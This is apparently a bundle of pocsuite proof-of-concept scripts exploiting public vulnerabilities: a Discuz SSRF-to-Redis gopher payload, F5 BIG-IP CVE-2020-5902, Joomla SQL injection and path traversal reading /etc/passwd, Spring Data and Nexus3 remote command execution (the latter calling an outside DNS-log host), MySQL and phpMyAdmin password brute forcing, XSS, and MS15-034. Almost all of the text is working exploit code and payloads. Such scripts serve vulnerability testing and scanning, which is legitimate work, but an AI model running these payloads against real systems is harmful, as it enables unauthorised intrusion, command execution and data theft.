        ssrf_url = "ssrf_gopher.php?ssrf="
        result = {}
        #Write your code here
        
        payload = ('gopher://127.0.0.1:6379/'\
                   '_eval "local t=redis.call(\'keys\',\'*_setting\');'\
                   'for i,v in ipairs(t) do redis.call(\'set\',v,'\
                   '\'a:2:{s:6:\\\"output\\\";a:1:{s:4:\\\"preg\\\";'\
                   'a:2:{s:6:\\\"search\\\";a:1:{s:7:\\\"plugins\\\";'\
                   's:5:\\\"/^./e\\\";}s:7:\\\"replace\\\";'\
                   'a:1:{s:7:\\\"plugins\\\";s:10:\\\"phpinfo();\\\";}}}'\
                   's:13:\\\"rewritestatus\\\";a:1:{s:7:\\\"plugins\\\";i:1;}}\')'\
                   ' end;return 1;" 0 %250D%250Aquit')
        
        tmpparse = urlparse.urlparse(self.url)
        if tmpparse.path != '':    
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
            #self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' +(tmpparse.path.split('/')[1],tmpparse.path.split('/')[0])['/' in tmpparse.path]
        else:
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc
        vul_url = self.url + '/' + ssrf_url + payload
 
        
        base_rep = req.get(vul_url)
        
        while base_rep.status_code == 200:
            verify_url = self.url + '/forum.php?mod=ajax&inajax=yes&action=getthreadtypes'
            rep = req.get(verify_url)
            flag = 'phpinfo';

            if flag in rep.content:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = verify_url
                payload_flush = 'gopher://127.0.0.1:6379/_*1%250D%250A$8%250D%250Aflushall%250D%250Aquit'
                recover_url = self.url + '/' +ssrf_url + payload_flush
                
                req.get(recover_url)
                req.get(self.url + '/forum.php')

                break

        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-
from urllib.parse import urlparse
from pocsuite3.api import requests as req
from pocsuite3.api import register_poc
from pocsuite3.api import Output, POCBase
from pocsuite3.api import POC_CATEGORY, VUL_TYPE


class TestPOC(POCBase):
    vulID = ''
    version = '1'
    author = 'hancool'
    vulDate = '2020-7-1'
    createDate = '2020-7-15'
    updateDate = '2020-7-15'
    references = [
        'https://github.com/jas502n/CVE-2020-5902']
    name = 'BIG-IP TMUI RCE??'
    appPowerLink = 'https://support.f5.com/csp/article/K52145254'
    appName = 'BIG-IP F5'
    appVersion = '11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x'
    vulType = VUL_TYPE.CODE_EXECUTION
    category = POC_CATEGORY.EXPLOITS.REMOTE
    desc = '''
            The Traffic Management User Interface (TMUI), also referred to as the Configuration utility, 
            has a Remote Code Execution (RCE) vulnerability in undisclosed pages. (CVE-2020-5902)
            
    '''
    samples = ['127.0.0.1']

    def _verify(self):
        result = {}
        pr = urlparse(self.url)
        if pr.port:
            ports = [pr.port]
        else:
            ports = [443]

        for port in ports:
            for schema in ['http','https']:
                try:
                    # check bypass
                    url_check =  '{}://{}:{}/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=test5902'.format(schema,pr.hostname,port)
                    r_test = req.get(url_check,verify=False)
                    # check fileRead.jsp
                    if r_test.status_code == 200:                        
                        result['VerifyInfo'] = {}
                        result['VerifyInfo']['URL'] = '{}:{}'.format(pr.hostname, port)
                        
                        url_read =  '{}://{}:{}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/group'.format(schema,pr.hostname,port)
                        r_read = req.get(url_read,verify = False)
                        if r_read.status_code == 200:
                            result['extra'] = {}
                            result['extra']['evidence'] = r_read.content.decode('utf-8').strip()
                        break
                except:
                    #raise
                    pass
            

        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("not vulnerability")
        return output


register_poc(TestPOC)



#!/usr/bin/env python
# -*- coding:utf-8 -*-


from pocsuite.net import req

from pocsuite.poc import Output, POCBase

from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '87242'

    version = '1'

    vulDate = '2014-08-31'

    author = 'anonymous'

    createDate = '2015-09-30'

    updateDate = '2015-09-30'

    references = ['http://www.sebug.net/vuldb/ssvid-87242']

    name = 'Joomla Spider Calendar SQL Injection'

    appPowerLink = 'http://extensions.joomla.org/extensions/calendars-a-events/events/events-calendars/22329'

    appName = 'Joomla Spider Calendar Component'

    appVersion = '<= 3.2.6'

    vulType = 'SQL Injection'

    desc = 'Joomla Spider Calendar Component SQL Injection in index.php, calendar_id param'

    samples = ['']

    def _attack(self):

        return self._verify()

    def _verify(self, verify=True):

        result = {}

        payload = '||exp(~(select*from(select md5(456546))a))'

        vul_url = '%s/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1' % self.url

        response = req.get(vul_url + payload).content

        if 'e02f052b7d3db73f99d4f5801f2b6fff' in response:
            result['VerifyInfo'] = {}

            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):

        output = Output(self)

        if result:

            output.success(result)

        else:

            output.fail('failed')

        return output


register(TestPOC)



#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = 'SSV-65307'  # vul ID
    version = '1'
    author = ['hh']
    vulDate = '2008-04-07'
    createDate = '2015-10-16'
    updateDate = '2015-10-16'
    references = ['https://www.exploit-db.com/exploits/5400/']
    name = '724CMS <= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability'
    appPowerLink = 'http://724cms.com/'
    appName = '724cms'
    appVersion = '<= 4.01'
    vulType = 'SQL Injection'
    desc = '''
        724Networks 724CMS 4.01及其早期版本的index.php存在SQL注入漏洞。远程攻击者通过ID参数来执行任意SQL命令。
    '''
    # the sample sites for examine
    samples = ['']

    def _verify(self):
        result = {}
        payload = "/index.php?ID=1 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
        verify_url = self.url + payload
        content = req.get(verify_url).content
        if 'fae0b27c451c728867a567e8c1bb4e53' in content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = verify_url
        return self.parse_verify(result)

    def _attack(self):
        return self._verify()

    def parse_verify(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')
        return output

register(TestPOC)


#!/usr/bin/env python
# -*- coding:utf-8 -*-

from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register

class TestPOC(POCBase):
    vulID = '67513'
    version = '1'
    author = 'p9k4r'
    vulDate = '2010-1-17'
    createDate = '2015-9-28'
    updateDate = '2015-9-28'
    references = ['http://www.sebug.net/vuldb/ssvid-67513']
    name = 'Joomla Component com_pc LFI Vulnerability'
    appPowerLink = 'joomla.org'
    appName = 'Joomla Component com_pc'
    appVersion = '*'
    vulType = 'Local File Inclusion'
    desc = 'LFI'
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self, verify=True):
        result = {}
        vul_url = '%s/index.php?option=com_pc&controller=../../../../../../../etc/passwd' % self.url
        response = req.get(vul_url + '%00', timeout=10).content

        if '/bin/bash' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.request import req #用法和 requests 完全相同
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import requests as req
from pocsuite3.api import POCBase, Output, register_poc as register

headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3970.5 Safari/537.36',
    'content-type': 'application/x-www-form-urlencoded',
    'Accept-Encoding': 'gzip, deflate, br'}
# 创建文件/tmp/success
poc_str = '''username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword='''


def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/users?page=&size=5'
    try:
        res = req.post(url, data=poc_str, verify=False, timeout=5, headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response


class TestPOC(POCBase):
    name = 'SpringDataCommons_RCE_CVE-2018-1273'
    vulID = 'CVE-2018-1273'  # https://www.seebug.org/vuldb/ssvid-97238
    author = ['debug']
    vulType = 'RCE'
    version = '1.0'  # default version: 1.0
    references = ['http://blog.nsfocus.net/cve-2018-1273-analysis/']
    desc = '''
		   Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。
		   Spring Data Commons 在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。
		   '''
    vulDate = '2020-02-06'
    createDate = '2020-02-06'
    updateDate = '2020-02-06'
    appName = 'SpringDataCommons'
    appVersion = '<=2.0.5'
    appPowerLink = ''
    samples = ['']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        if 'nested exception is java.lang.reflect.InvocationTargetException' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' SpringDataCommons_RCE_CVE-2018-1273' + ' is exist!'
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding: utf-8 -*-
# from pocsuite.api.poc import register
# from pocsuite.api.poc import Output, POCBase
import pymysql
from pocsuite3.api import POCBase, Output, register_poc as register


def mysql_pass(ip, port):
    mysql_username = ('root', 'test', 'admin', 'user')
    common_weak_password = ('802352', '123456', 'test', 'root', 'admin', 'user')
    success = False
    host = ip
    port = port
    res = []
    for username in mysql_username:
        for password in common_weak_password:
            try:
                db = pymysql.connect(host, username, password)
                success = True
                if success:
                    res.append(username)
                    res.append(password)
                break
            except Exception as e:
                pass
        if success:
            break
    return res


def poc(url):
    if url.startswith("http://"):
        url = url.strip("http://")
    if url.endswith("/"):
        url = url.strip("/")
    if ":" in url:
        url = url.split(":")
        ip = url[0]
        port = url[1]
        response = mysql_pass(ip, port)
        return response
    else:
        ip = url
        response = mysql_pass(ip, 3306)
        return response


class TestPOC(POCBase):
    name = 'mysql_weak_pass'
    vulID = '无'
    author = ['sxd']
    vulType = 'weak-pass'
    version = '1.0'  # default version: 1.0
    references = ['https://www.seebug.org/vuldb/ssvid-62522']
    desc = '''
		   MySQL 弱口令漏洞指 MySQL 数据库 root 账号对应的密码长度太短或者复杂度不够，如仅包含数字，或仅包含字母等。

弱口令容易被暴力破解，一旦被恶意利用来登录系统，会导致数据泄露，如果得到了root权限登录mysql服务，则可以写入恶意文件，危害更大，本文就是以root身份远程登录mysql服务写入了一句话木马连接了菜刀。
		   '''
    vulDate = '2020-03-27'
    createDate = '2020-03-27'
    updateDate = '2020-03-27'
    appName = 'mysql'
    appVersion = 'mysql all'
    appPowerLink = ''
    samples = ['pymysql']

    def _attack(self):
        '''attack mode'''
        return self._verify()

    def _verify(self):
        '''verify mode'''
        result = {}
        response = poc(self.url)
        print(response)
        if response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + ' mysql_weak_paass' + ' is exist!'
            result['AdminInfo'] = {}
            result['AdminInfo']['Username'] = response[0]
            result['AdminInfo']['Password'] = response[1]
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/env python
# -*- coding: utf-8 -*-

"""
Copyright (c) 2014-2015 pocsuite developers (http://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

# requests
from pocsuite.api.request import req
import urllib
# register
from pocsuite.api.poc import register
# report
from pocsuite.api.poc import Output, POCBase
 
import random
from string import letters
 

# 基础基类
class NexusManagerPOC(POCBase):
    vulID = '57'  # ssvid ID 如果是提交漏洞的同时提交 PoC,则写成 0
    version = '1'  # 默认为1
    vulDate = '2019-02-05'  # 漏洞公开的时间,不知道就写今天
    author = 'shadowsock5'  # PoC作者的大名
    createDate = '2019-02-20'  # 编写 PoC 的日期
    updateDate = '2019-02-20'  # PoC 更新的时间,默认和编写时间一样
    references = ['https://mp.weixin.qq.com/s/P1KC7wadbEZbHvavYQjbVA']  # 漏洞地址来源,0day不用写
    name = 'Nexus3 RCE'  # PoC 名称
    appPowerLink = ['https://support.sonatype.com/hc/en-us']  # 漏洞厂商主页地址
    appName = 'Nexus Repository Manager 3'  # 漏洞应用名称
    appVersion = '3.6.2 版本到 3.14.0 版本'  # 漏洞影响版本
    vulType = 'Nexus3 RCE'  # 漏洞类型,类型参考见 漏洞类型规范表
    desc = '''
        Nexus Repository Manager 3 RCE
    '''  # 漏洞简要描述
    samples = ['https://www.shodan.io/search?query=Nexus+Repository+Manager+3']  # 测试样列,就是用 PoC 测试成功的网站
    install_requires = []  # PoC 第三方模块依赖，请尽量不要使用第三方模块，必要时请参考《PoC第三方模块依赖说明》填写
    cvss = u"严重"  # 严重,高危,中危,低危

    
    # 使用随机字符串作为banner，通过ceye的接口判断命令是否被执行
    DOMAIN = 'xxx.ceye.io'   # 自己的ceye域名
    TOKEN = '76dce59a986eab595838f7dc7490xxxx'   # 自己的API TOKEN
    BANNER = ''.join([random.choice(letters) for i in range(6)])
    CEYE_URL = 'http://api.ceye.io/v1/records?token={0}&type=dns&filter={1}'.format(TOKEN, BANNER)

    # 指纹方法
    def _fingerprint(self):
        pass

    # 验证模块 pocsuite -r 1-redis.py -u 10.1.5.26 --verify
    def _verify(self):
        # 调用指纹方法
        result={}

        vul_url = self.url
        
        target_url = vul_url + "/service/extdirect"

        headers = {'Referer':''}
        import json
        j = {"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":25,"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName('java.lang.Runtime').getRuntime().exec('ping {0}.{1}').waitFor()".format(self.BANNER, self.DOMAIN)},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":4}
        
        try:
            resp = req.post(target_url, json=j, headers=headers, timeout=1)
        except Exception as e:
            print e
        
        import time
        time.sleep(2) # 休眠2s等待ceye生成记录
        if self.dnslog_sucess(self.CEYE_URL):
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = target_url
            return self.save_output(result)
        return self.save_output(result)

    # 验证DNS已被解析，命令执行
    def dnslog_sucess(self, url):
        resp = req.get(url)
        d = resp.json()
        try:
            name = d['data'][0]['name']
            if self.BANNER in name:
                return True
        except Exception:
            return False            

    # 攻击模块
    def _attack(self):
        return self._verify()

    # 输出报告
    def save_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail()
        return output

# 注册类
register(NexusManagerPOC)



#!/usr/bin/env python
# -*- coding:utf-8 -*-

import socket
import urlparse
from pocsuite.api.poc import POCBase, Output
from pocsuite.api.poc import register

"""
install:
pip install pocsuite

usage:
pocsuite -r redis_poc.py -u 24.207.29.90 --attack
"""
class TestPOC(POCBase):
    vulID = '89339'
    version = '1'
    author = ['Anonymous']
    vulDate = '2015-10-26'
    createDate = '2015-10-26'
    updateDate = '2015-10-26'
    references = ['http://sebug.net/vuldb/ssvid-89339']
    name = 'Redis 未授权访问 PoC'
    appPowerLink = 'http://redis.io/'
    appName = 'Redis'
    appVersion = 'All'
    vulType = 'Unauthorized access'
    desc = '''
        redis 默认不需要密码即可访问，黑客直接访问即可获取数据库中所有信息，造成严重的信息泄露。
    '''
    samples = ['']

    def _verify(self):
        result = {}
        payload = '\x2a\x31\x0d\x0a\x24\x34\x0d\x0a\x69\x6e\x66\x6f\x0d\x0a'
        s = socket.socket()
        socket.setdefaulttimeout(10)
        try:
            host = urlparse.urlparse(self.url).netloc
            port = 6379
            s.connect((host, port))
            s.send(payload)
            recvdata = s.recv(1024)
            if recvdata and 'redis_version' in recvdata:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url
                result['VerifyInfo']['Port'] = port
        except:
            pass
        s.close()
        return self.parse_attack(result)

    def _attack(self):
        return self._verify()

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)
# TestPOC.execute()


#!/usr/bin/env python
# coding: utf-8

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID='5'
    version = '1'
    author = ['']
    vulDate = ''
    createDate = ''
    updateDate = ''
    references = ['http://www.evalshell.com', 'http://www.cnseay.com/3714/']
    name = 'dedecms install/index.php.bak重装漏洞'
    appPowerLink = 'http://www.dedecms.cn/'
    appName = 'dedecms'
    appVersion = '5.7'
    vulType = 'Code Execution'
    desc = '''
            dedecms
            在默认安装后回生成install/index.php.bak。来判断网站是否安装。
            但是在web容器为apache的情况下，对index.php.bak会解析为php文件
            详情请搜索apache解析漏洞
    '''
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self, verify=True):
        result = {}
        vul_url = '%s/install/index.php.bak' % self.url

        response = req.get(vul_url)
        if response.status_code == 200:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output

register(TestPOC)



#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re

class TestPOC(POCBase):
    vulID = '67594'  # ssvid
    version = '1.0'
    author = ['kikay']
    vulDate = '2010-03-02'
    createDate = '2016-01-05'
    updateDate = '2016-01-05'
    references = ['http://www.sebug.net/vuldb/ssvid-67594']
    name = 'Joomla Component JE Event Calendar SQL Injection Vulnerability'
    appPowerLink = 'http://www.joomla.com'
    appName = 'Joomla Component JE Event Calendar'
    appVersion = 'N/A'
    vulType = 'SQL Injection'
    desc = '''
        Joomla!的组件JE Event Calendars (com_jeeventcalendar)存在SQL注入漏洞。
        远程攻击者可以借助脚本index.php中的事件操作的event_id参数，执行任意的SQL命令。
    '''
    samples = ['http://starstudentcard.com']

    def _attack(self):
        #利用SQL注入读取数据库信息
        result = {}
        #访问的地址
        exploit='/index.php?option=com_jeeventcalendar&view=event&Itemid=155&event_id='
        #利用Union方式读取数据库信息
        payload="-1%22+UNION+ALL+SELECT+1,concat(0x247e7e7e24,user(),0x2a2a2a,version(),0x247e7e7e24),3,4,5,6,7,8,9,10,11%23"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #提取信息的正则表达式
        parttern='\$~~~\$(.*)\*\*\*(.*)\$~~~\$'
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查返回结果
        if resp.status_code==200:
            #提取信息
            match=re.search(parttern,resp.content,re.M|re.I)
            if match:
                #漏洞利用成功
                result['DatabaseInfo']={}
                #数据库用户名
                result['DatabaseInfo']['Username']=match.group(1)
                #数据库版本
                result['DatabaseInfo']['Version']=match.group(2)
        return self.parse_output(result)

    def _verify(self):
        #通过计算md5(1)的值，来验证SQL注入
        result = {}
        #访问的地址
        exploit='/index.php?option=com_jeeventcalendar&view=event&Itemid=155&event_id='
        #利用Union方式（计算md5(1)）
        payload="-1%22+UNION+ALL+SELECT+1,md5(1),3,4,5,6,7,8,9,10,11%23"
        #构造漏洞利用连接
        vulurl=self.url+exploit+payload
        #自定义的HTTP头
        httphead = {
          'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
          'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
          'Connection':'keep-alive'
        }
        #发送请求
        resp=req.get(url=vulurl,headers=httphead,timeout=50)
        #检查是否含有特征字符串(md5(1)=c4ca4238a0b923820dcc509a6f75849b)
        if 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:
            #漏洞验证成功
            result['VerifyInfo']={}
            result['VerifyInfo']['URL'] = self.url+exploit
            result['VerifyInfo']['Payload'] = payload
        return self.parse_output(result)

    def parse_output(self, result):
        #parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)


#!/usr/bin/env python
# -*- coding:utf-8 -*-
from pocsuite.net import req
from pocsuite.poc import Output, POCBase
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '87285'
    version = '1'
    vulDate = '2014-09-07'
    author = 'anonymous'
    createDate = '2015-09-30'
    updateDate = '2015-09-30'
    references = ['http://www.sebug.net/vuldb/ssvid-87285']
    name = 'Joomla Spider Form Maker SQL Injection '
    appPowerLink = 'http://www.joomlaboat.com/youtube-gallery'
    appName = 'Joomla Spider Form Maker'
    appVersion = '<= 3.4'
    vulType = 'SQL Injection'
    desc = 'Joomla Spider Form Maker SQL Injection in id'
    samples = ['']


    def _attack(self):
        return self._verify()


    def _verify(self, verify=True):
        result = {}
        payload = '||exp(~(select*from(select md5(456546))a))'
        vul_url = '%s/index.php?option=com_formmaker&view=formmaker&id=1' % self.url
        response = req.get(vul_url + payload).content

        if 'e02f052b7d3db73f99d4f5801f2b6fff' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url

        return self.parse_attack(result)


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('failed')

        return output

register(TestPOC)


#!/usr/bin/env python
# coding: utf-8
from pocsuite.api.request import req
from pocsuite.api.poc import register
from pocsuite.api.poc import Output, POCBase


class TestPOC(POCBase):
    vulID = '00003'
    version = '1.0'
    author = ''
    vulDate = '2013-04-23'
    createDate = '2016-03-07'
    updateDate = '2016-03-07'
    references = ''
    name = 'phpMyAdmin 弱密码漏洞'
    appPowerLink = 'http://www.phpMyAdmin.com/'
    appName = 'phpMyAdmin'
    appVersion = 'ALL'
    vulType = 'Weak Password'
    desc = '''
    phpMyAdmin弱口令登录，从而导致攻击者可据此信息进行后续攻击。
    '''
    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        flag_list = ['src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">',
                     'class="disableAjax" title=']
        user_list = ['root', 'admin']
        password_list = ['root', '123456', '12345678', 'password', 'passwd', '123']
        try:
            response = req.get(self.url)
            if 'name=\"phpMyAdmin\"' in response.content:
                target_url = str(self.url) + "/index.php"
            else:
                response = req.get(self.url + '/phpmyadmin/index.php')
                if 'input_password' in response.content and 'name="token"' in response.content:
                    target_url = self.url + "/phpmyadmin/index.php"
        except Exception as e:
            pass

        for user in user_list:
            for password in password_list:
                payload_data = "pma_username=" + str(user.strip()) + "&pma_password=" + str(password.strip()) + "" \
                               "&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci"
                try:
                    respond = req.post(target_url, data=payload_data)
                    for flag in flag_list:
                        if flag in respond.content:
                            result['VerifyInfo'] = {}
                            result['VerifyInfo']['URL'] = target_url
                            result['VerifyInfo']['Payload'] = payload_data
                except Exception as e:
                    # print(e)
                    pass
        return self.parse_output(result)

    def parse_output(self, result):
        # parse output
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)



#!/usr/bin/python
# -*- coding:utf-8 -*-

import string
import random
import time
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    name = '74cms 3.2 jobs_list Cross sitescripting'
    vulID = '0'
    author = ['LRestless']
    vulType = 'xss'
    version = '1'
    references = ['']
    desc = '''74cms 3.2 jobs_list Cross sitescripting'''

    vulDate = ''
    createDate = '2019-03-29'
    updateDate = '2019-03-29'

    appName = '74cms'
    appVersion = '3.20'
    appPowerLink = 'http://www.74cms.com'
    samples = ['']

    def _attack(self):
        """attack mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/jobs/jobs-list.php"
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
        flag = flag.lower()
        payload = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%28{}%29%20style=%22%22".format(flag)
        url = self.url + payload
        resp = s.get(url)
        time.sleep(2)
        if '" autofocus onfocus=alert({}) style='.format(flag) in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def _verify(self):
        """verify  mode"""
        result = {}
        s = req.Session()
        s.get(self.url)
        self.url = self.url.strip('/') + "/jobs/jobs-list.php"
        flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8))
        flag = flag.lower()
        payload = "/jobs/jobs-list.php?key=%22%20autofocus%20onfocus=alert%28{}%29%20style=%22%22".format(flag)
        url = self.url + payload
        resp = s.get(url)
        time.sleep(2)
        if '" autofocus onfocus=alert({}) style='.format(flag) in resp.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)




#!/usr/bin/env python
#_*_ encoding: utf-8 _*_

from pocsuite3.api import register_poc
from pocsuite3.api import Output
from pocsuite3.api import POCBase
from pocsuite3.api import requests
from pocsuite3.api import logger

class Docker(POCBase):
    vulID = '89696'
    version = '1.0'
    author = ['big04dream']
    vulDate = '2015-10-30'
    createDate = '2019-10-17'
    updateDate = '2019-10-17'
    references = ['https://www.seebug.org/vuldb/ssvid-89696']
    name = 'Docker Remote API Unauthrized Access'
    appPowerLink = 'https://www.docker.com/'
    appName = 'Docker'
    appVersion = 'all'
    vulType = 'Unauthrized Access'
    desc = '''
    Docker Remote API Unauthrized Access
    '''

    def _verify(self):
        result = {}
        try:
            url = self.url + "/info"
            res = requests.get(url)
            if res.status_code == 200 and res.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = url
                result['VerifyInfo']['Payload'] = url
        except Exception as e:
            logger.info(e)
        return self.parse_ouput(result)

    def _attack(self):
        return self._verify()

    def parse_ouput(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('not docker vulnerability')
        return output

register_poc(Docker)


#!/usr/bin/env python
# coding: utf-8

import socket
import random
from urlparse import urljoin
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
from pocsuite.lib.utils.funs import url2ip


class TestPOC(POCBase):
    vulID = '89233'  # vul ID
    version = '1'
    author = ['cnyql']
    vulDate = '2015-04-14'
    createDate = '2015-04-16'
    updateDate = '2015-09-19'
    references = ['http://www.sebug.net/vuldb/ssvid-89233']
    name = 'IIS 系列 Http.sys 处理 Range 整数溢出漏洞'
    appPowerLink = 'http://www.iis.net/'
    appName = 'Miscrosoft IIS httpd'
    appVersion = 'N/A'
    vulType = 'Buffer Overflow'
    desc = '''
    2015年04月14日，微软发布严重级别的安全公告 MS15-034，编号为 CVE-2015-1635，据称在 Http.sys 中的漏洞可能允许远程执行代码。
    '''

    def _verify(self):

        ip = url2ip(self.url)
        hexAllFfff = "18446744073709551615"
        flag = False
        req1 = "GET /HTTP/1.0\r\n\r\n"
        req = "GET /HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n"

        client_socket =socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((ip, 80))
        client_socket.send(req1)
        boringResp = client_socket.recv(1024)

        if "Microsoft" in boringResp:
            client_socket.close()
            client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client_socket.connect((ip,80))
            client_socket.send(req)
            goodResp = client_socket.recv(1024)

            if "Requested RangeNot Satisfiable" in goodResp:
                flag = True

        return self.parse_verify(flag)

    def parse_verify(self, flag):
        output = Output(self)
        result = {}

        if flag:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            output.success(result)
        
        else:
            output.fail('No vulnerability found.')

        return output
		
    def _attack(self):
        return self._verify()


register(TestPOC)
